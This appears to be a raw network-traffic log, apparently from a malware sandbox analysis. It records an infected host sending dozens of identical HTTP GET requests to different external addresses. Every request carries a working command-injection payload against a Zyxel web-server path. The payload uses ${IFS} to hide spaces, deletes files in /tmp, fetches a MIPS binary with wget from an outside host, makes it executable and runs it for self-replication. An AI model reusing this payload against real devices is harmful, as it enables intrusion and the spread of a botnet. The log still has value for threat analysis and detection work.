                                                Jan 12, 2024 18:16:21.411990881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4127192.168.2.2346502141.250.31.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.412034988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4128192.168.2.2357182121.205.114.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.412081957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4129192.168.2.2338700110.250.43.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.412115097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4130192.168.2.2346196124.204.244.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.412168980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4131192.168.2.235924419.237.46.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.412201881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4132192.168.2.233579274.14.179.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.412250996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4133192.168.2.2360024134.35.68.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.412308931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4134192.168.2.234035295.13.31.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.412339926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4135192.168.2.2333238155.170.18.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.428628922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4136192.168.2.233844649.83.73.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.428677082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4137192.168.2.2350108211.1.130.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.428715944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4138192.168.2.2353466100.201.151.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.428762913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4139192.168.2.2357616140.66.75.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.428807974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4140192.168.2.2337242155.9.32.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.428842068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4141192.168.2.235432663.255.84.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.428889036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4142192.168.2.2341620212.216.206.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.428913116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4143192.168.2.233701659.215.140.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.428934097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4144192.168.2.233960662.131.234.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.428981066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4145192.168.2.233681091.233.197.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429033995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4146192.168.2.2341202105.154.64.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429076910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4147192.168.2.234367050.186.38.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429107904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4148192.168.2.2340564116.17.88.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429138899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4149192.168.2.2337796136.135.131.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429179907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4150192.168.2.2336102138.116.197.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429214001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4151192.168.2.2349128121.126.80.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429256916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4152192.168.2.235822458.120.189.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429280043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4153192.168.2.235325847.126.143.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429327011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4154192.168.2.234299285.73.162.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429348946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4155192.168.2.23539044.182.101.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429409981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4156192.168.2.2353472165.239.21.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429441929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4157192.168.2.2350868139.186.51.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429517984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4158192.168.2.2352928128.189.97.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429569006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4159192.168.2.2356634116.17.119.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429569960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4160192.168.2.2334446116.191.221.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429600000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4161192.168.2.2347280201.136.196.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429647923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4162192.168.2.2343962176.44.126.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429704905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4163192.168.2.2337718101.247.219.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429748058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4164192.168.2.23345641.245.65.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429771900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4165192.168.2.2355896118.95.162.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429821014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4166192.168.2.235877838.175.124.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429847956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4167192.168.2.2341188112.195.53.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429907084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4168192.168.2.2335332133.235.102.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429919004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4169192.168.2.2350874168.23.234.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.429963112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4170192.168.2.2357960117.180.74.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430027008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4171192.168.2.2340796179.103.39.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430068970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4172192.168.2.2360244107.222.108.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430107117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4173192.168.2.2342740206.43.207.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430123091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4174192.168.2.2359932134.169.147.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430167913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4175192.168.2.235520486.94.93.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430187941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4176192.168.2.2354422220.72.51.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430229902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4177192.168.2.235271263.43.233.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430277109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4178192.168.2.2333156176.141.78.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430322886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4179192.168.2.235606890.207.78.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430361032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4180192.168.2.2346736164.166.75.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430378914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4181192.168.2.234812060.217.45.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430425882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4182192.168.2.2344780148.248.199.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430463076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4183192.168.2.23335364.113.172.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430502892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4184192.168.2.2351908209.253.158.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430540085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4185192.168.2.235227012.194.52.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430594921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4186192.168.2.2358408137.66.110.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430612087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4187192.168.2.2346294102.187.24.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430639029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4188192.168.2.2352172151.85.67.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430701971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4189192.168.2.2357886184.64.53.169443
                                                TimestampBytes transferredDirectionData
